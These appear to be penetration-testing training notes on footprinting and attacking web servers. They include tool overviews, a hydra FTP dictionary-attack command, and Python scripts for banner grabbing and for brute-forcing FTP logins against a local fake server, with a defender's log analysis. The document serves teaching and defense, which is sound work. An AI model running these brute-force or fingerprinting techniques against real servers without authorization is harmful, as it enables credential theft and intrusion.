# Module 13: Hacking Web Servers

## Overview of Web Server <a href="#overview-of-web-server" id="overview-of-web-server"></a>

A web server is not just hardware: the term also covers the software that accepts and answers HTTP requests. The client starts the exchange: when a browser wants a resource such as a web page, an image, or a video, it sends an HTTP request to the server. The web server fetches the requested content from disk, a database, or a back-end application server and returns it in an HTTP response. If the resource cannot be found, the server returns an error response instead (for example, a 404 status).

## Lab 1: Footprint the Web Server <a href="#lab-1-footprint-the-web-server" id="lab-1-footprint-the-web-server"></a>

**Overview of Web Server Footprinting**

Web server footprinting gathers system-level data such as account details, the operating system, software versions, server names, and in some cases database details. A plain Telnet session to the HTTP port is enough to read the server name, server type, operating system, and applications from the response headers; dedicated footprinting tools such as Netcraft, ID Serve, and httprecon automate the same extraction and add their own checks. The tasks below look at what each of these tools collects from the target server.

### Task 1: Information Gathering using Ghost Eye <a href="#task-1-information-gathering-using-ghost-eye" id="task-1-information-gathering-using-ghost-eye"></a>

[**`Ghost Eye`**](https://github.com/BullsEye0/ghost_eye) is an information-gathering tool written in Python 3. It needs only a domain name or an IP address as input and runs on any Linux distribution that has Python 3.

Ghost Eye gathers information through a Whois lookup, DNS lookup, EtherApe, an Nmap port scan, an HTTP header grabber, a clickjacking test, a robots.txt scanner, a link grabber, an IP location finder, and traceroute.

### Task 2: Perform Web Server Reconnaissance using Skipfish <a href="#task-2-perform-web-server-reconnaissance-using-skipfish" id="task-2-perform-web-server-reconnaissance-using-skipfish"></a>

Skipfish is an active reconnaissance tool for web applications deployed on a web server. It builds an interactive sitemap of the target by recursive crawling and dictionary-based probes, then annotates the map with the output of a number of active (but hopefully non-disruptive) security checks. The resulting report is meant to serve as a foundation for a professional web application security assessment.

### Task 3: Footprint a Web Server using the httprecon Tool <a href="#task-3-footprint-a-web-server-using-the-httprecon-tool" id="task-3-footprint-a-web-server-using-the-httprecon-tool"></a>

Web applications let organizations publish information, interact with Internet users, and establish an e-commerce or e-government presence. However, an organization that is not rigorous in configuring and operating its public website exposes itself to a variety of security threats. The threats are largely the same as in the physical world (fraud, theft, vandalism, and terrorism), but online they can be carried out remotely, anonymously, and at scale. Organizations face monetary losses, damage to reputation, and legal action if an intruder succeeds in violating the confidentiality of their data.

**`httprecon`** is a tool for advanced web server fingerprinting. It goes beyond reading the Server banner: it combines banner grabbing, status code enumeration, and header ordering analysis of the target web server, which together identify the server software more reliably than the banner alone.

### Task 4: Footprint a Web Server using ID Serve <a href="#task-4-footprint-a-web-server-using-id-serve" id="task-4-footprint-a-web-server-using-id-serve"></a>

Pen testers must be familiar with banner grabbing: it is used to inventory servers, check that they are patched and compliant, locate rogue servers, and work out the role a server plays in the network. This task demonstrates banner grabbing with ID Serve, which identifies the server software running on a remote target from the headers it returns.

### Task 5: Footprint a Web Server using Netcat and Telnet <a href="#task-5-footprint-a-web-server-using-netcat-and-telnet" id="task-5-footprint-a-web-server-using-netcat-and-telnet"></a>

**Netcat**

Netcat is a networking utility that reads and writes data across network connections over TCP or UDP. It is a reliable “back-end” tool that can be used directly or driven by other programs and scripts, and it doubles as a network debugging and exploration tool.

**Telnet**

Telnet is a client-server network protocol, widely used on the Internet and on LANs, that gives a user a login session on a remote host by emulating a terminal attached to that host. Its main security problems are the following:

* It does not encrypt any data sent through the connection, so anyone on the path can read the session, credentials included.
* The protocol itself has no authentication scheme; any login is left to the application on the far end, and the credentials travel in the clear.

Because Telnet is simply a raw TCP client, it also serves as a banner-grabbing tool: connect it to a web server's HTTP port, type a request by hand, and the Server field of the HTTP response header reveals the server software.
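The following script is an added example, not code from Ghost Eye, httprecon, or this lab manual. It does by hand what the Netcat and Telnet task above does at the keyboard (open a TCP connection, type an `HTTP/1.0` request, read the raw reply) and then applies two of the checks mentioned earlier on this page: Ghost Eye's HTTP header grab and clickjacking test, and httprecon's header-ordering analysis. So that it runs offline, the target is a throwaway server built on Python's `http.server`, started on `127.0.0.1` on an ephemeral port; its default `Server` header stands in for the version leak the lab is hunting for. The server class, the port choice and the request sent are all assumptions of the example.

```python
"""Raw-socket banner grab against a throwaway local HTTP server.

Example added for this page; it is not Ghost Eye, httprecon or the lab's own
code. The victim is Python's http.server on 127.0.0.1 (an assumption made so
the script runs offline); its default Server header plays the role of the
information leak the lab hunts for.
"""
import http.server
import socket
import threading


class LeakyHandler(http.server.BaseHTTPRequestHandler):
    """Minimal server that answers HEAD / and, like many real servers,
    volunteers its software version in the Server header while sending
    none of the anti-framing headers."""

    def do_HEAD(self):
        self.send_response(200)          # send_response adds Server: and Date:
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, format, *args):  # keep the demo quiet
        pass


def grab_banner(host, port, timeout=5.0):
    """Do by hand what `nc host 80` or `telnet host 80` does: open a TCP
    connection, type an HTTP/1.0 request, and read the raw reply until the
    server closes the connection.

    Returns (status_line, headers) where headers is an ordered list of
    (name, value) pairs; order is kept because fingerprinting tools such as
    httprecon use header ordering as a signal."""
    request = f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:                      # HTTP/1.0: server closes when done
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    raw = b"".join(chunks)
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    status_line = lines[0]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status_line, headers


def header(headers, name):
    """Case-insensitive lookup of the first header called `name`."""
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def clickjacking_exposed(headers):
    """Ghost Eye's clickjacking test boils down to this: a page can be framed
    by an attacker's site unless X-Frame-Options or a CSP frame-ancestors
    directive forbids it."""
    xfo = header(headers, "X-Frame-Options")
    csp = header(headers, "Content-Security-Policy") or ""
    return xfo is None and "frame-ancestors" not in csp.lower()


def run_demo():
    """Start the throwaway server, fingerprint it, and shut it down."""
    server = http.server.HTTPServer(("127.0.0.1", 0), LeakyHandler)
    port = server.server_address[1]      # ephemeral port chosen by the OS
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        status_line, headers = grab_banner("127.0.0.1", port)
    finally:
        server.shutdown()
        server.server_close()
    return {
        "status": status_line,
        "server": header(headers, "Server"),
        "header_order": [n for n, _ in headers],
        "clickjacking_exposed": clickjacking_exposed(headers),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Against a real target, replace `run_demo()` with a call to `grab_banner(host, 80)`; the `Server` value is what ID Serve and the Telnet task read, and the `header_order` list is the kind of signal httprecon compares against its fingerprint database. The point of the HTTP/1.0 request is that the server closes the connection after one response, so a loop of `recv` until EOF collects the complete reply without needing to parse `Content-Length`.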

### Task 6: Enumerate Web Server Information using Nmap Scripting Engine (NSE) <a href="#task-6-enumerate-web-server-information-using-nmap-scripting-engine-nse" id="task-6-enumerate-web-server-information-using-nmap-scripting-engine-nse"></a>

Nmap, together with the Nmap Scripting Engine (NSE), can extract a lot of valuable information from a target web server. Beyond the plain port and version scan, NSE ships scripts such as `http-headers`, `http-title`, `http-methods`, and `http-enum` that reveal the server software, page titles, supported HTTP methods, and common paths to an attacker.

### Task 7: Uniscan Web Server Fingerprinting in Parrot Security <a href="#task-7-uniscan-web-server-fingerprinting-in-parrot-security" id="task-7-uniscan-web-server-fingerprinting-in-parrot-security"></a>

**`Uniscan`** is a versatile server fingerprinting tool. Besides simple checks like ping, traceroute, and nslookup, it runs static, dynamic, and stress checks against a web server, and it can also run automated Bing and Google searches on the IPs it is given. Uniscan combines all of this data into a single report file for the user.

## Lab 2: Perform a Web Server Attack <a href="#lab-2-perform-a-web-server-attack" id="lab-2-perform-a-web-server-attack"></a>

**Overview of Web Server Attack**

Attackers can cause various kinds of damage to an organization by attacking a web server, including:

* Compromise of a user account
* Secondary attacks from the website and website defacement
* Root access to other applications or servers
* Data tampering and data theft
* Damage to the company’s reputation

### Task 1: Crack FTP Credentials using a Dictionary Attack <a href="#task-1-crack-ftp-credentials-using-a-dictionary-attack" id="task-1-crack-ftp-credentials-using-a-dictionary-attack"></a>

A dictionary, or wordlist, contains thousands of candidate words that password cracking tools feed to a password-protected system. An attacker may guess a password by hand or use automated tools and techniques such as the dictionary method. Most password cracking succeeds because passwords are weak or easily guessable.

{% code overflow="wrap" %}

```bash
hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://[IP Address]
```

{% endcode %}

> Hydra tries every combination of the usernames and passwords in **Usernames.txt** and **Passwords.txt** against the FTP server and prints each username/password pair it cracks.
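The script below is an added example, not Hydra and not the lab's own code. It reproduces the attack the `hydra` command performs (every username from one list against every password from another, over the FTP control channel, with a fresh connection per attempt) and also shows the defender's side: the server keeps a log of attempts, and a burst of `530 Login incorrect` responses from one address is what a SOC alerts on. So that it runs offline, the FTP server is a constructed stand-in that speaks just enough of the protocol (`USER`, `PASS`, `QUIT`) for Python's `ftplib` client to log in; the valid account, the wordlists and the localhost port are all assumptions of the example.

```python
"""Dictionary attack against a fake FTP server, plus the server-side view.

Example added for this page; it is not hydra and not the lab's own code. The
FTP server is a constructed stand-in that speaks just enough of the protocol
(USER/PASS/QUIT) for ftplib to log in, so the demo runs offline; the
credential store and the wordlists are also constructed.
"""
import ftplib
import socketserver
import threading

# Constructed: the one valid account on the fake server (an assumption).
VALID_ACCOUNTS = {"martin": "apple"}


class FakeFTPHandler(socketserver.StreamRequestHandler):
    """Minimal FTP control channel that records every login attempt."""

    def handle(self):
        user = None
        self.wfile.write(b"220 Fake FTP service ready\r\n")
        while True:
            line = self.rfile.readline()
            if not line:                       # client closed the connection
                break
            cmd, _, arg = line.decode("latin-1").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.wfile.write(b"331 Password required\r\n")
            elif cmd == "PASS":
                ok = VALID_ACCOUNTS.get(user) == arg
                # The server's log: (source address, username, success?)
                self.server.attempts.append((self.client_address[0], user, ok))
                self.wfile.write(b"230 Login successful\r\n" if ok
                                 else b"530 Login incorrect\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"221 Goodbye\r\n")
                break
            else:
                self.wfile.write(b"502 Command not implemented\r\n")


def dictionary_attack(host, port, usernames, passwords):
    """What `hydra -L users -P passwords ftp://host` does: try every
    username/password combination and keep the pairs the server accepts.
    One fresh connection per attempt; a user is skipped once cracked."""
    found = []
    for user in usernames:
        for password in passwords:
            ftp = ftplib.FTP()
            try:
                ftp.connect(host, port, timeout=5)
                ftp.login(user, password)      # raises error_perm on a 530 reply
                found.append((user, password))
                break
            except ftplib.error_perm:
                pass                           # wrong password, try the next one
            finally:
                ftp.close()
    return found


def failed_logins_by_source(attempts):
    """The defender's view of the same log: count 530 responses per source
    address. A burst like this from one address is the brute-force signature."""
    counts = {}
    for source, _user, ok in attempts:
        if not ok:
            counts[source] = counts.get(source, 0) + 1
    return counts


def run_demo():
    """Start the fake server, run the attack, return findings and the log."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeFTPHandler)
    server.daemon_threads = True
    server.attempts = []
    port = server.server_address[1]            # ephemeral port chosen by the OS
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        found = dictionary_attack(
            "127.0.0.1", port,
            usernames=["admin", "martin", "ftp"],            # constructed wordlist
            passwords=["password", "123456", "apple", "qwerty"],  # constructed wordlist
        )
    finally:
        server.shutdown()
        server.server_close()
    return found, failed_logins_by_source(server.attempts)


if __name__ == "__main__":
    found, failures = run_demo()
    print("cracked:", found)
    print("failed logins per source:", failures)
```

With the constructed lists the attack needs eleven login attempts to recover the one valid pair, and the server log shows ten failures from a single address; that ratio of failures to successes, concentrated in seconds, is the signal to alert on and the reason account lockout or rate limiting on FTP logins is the first fix.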

***

***

***

**`Hacker's Mantra:`** `Access is God. - Anh Konge`

